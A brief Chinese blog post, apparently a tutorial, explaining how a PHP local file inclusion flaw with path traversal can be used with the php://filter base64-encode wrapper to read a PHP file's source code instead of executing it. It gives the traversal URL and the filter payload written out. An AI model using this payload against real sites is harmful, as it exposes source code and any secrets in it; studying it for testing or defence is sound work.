<?php include['a'] ?>
a.com/a.php?a=../0x007.php 如果是这样写的 会当作php来执行 并不会看到源码。
今天我所说的是 不让0x007.php执行 看到的是0x007.php的源码
利用php:filter//来读取
php://filter/read=convert.base64-encode/resource=../0x007.php 这样读取出来是源码 不进行执行。
点击查看更多内容
为 TA 点赞
评论
共同学习,写下你的评论
评论加载中...
作者其他优质文章
正在加载中
感谢您的支持,我会继续努力的~
扫码打赏,你说多少就多少
赞赏金额会直接到老师账户
支付方式
打开微信扫一扫,即可进行扫码打赏哦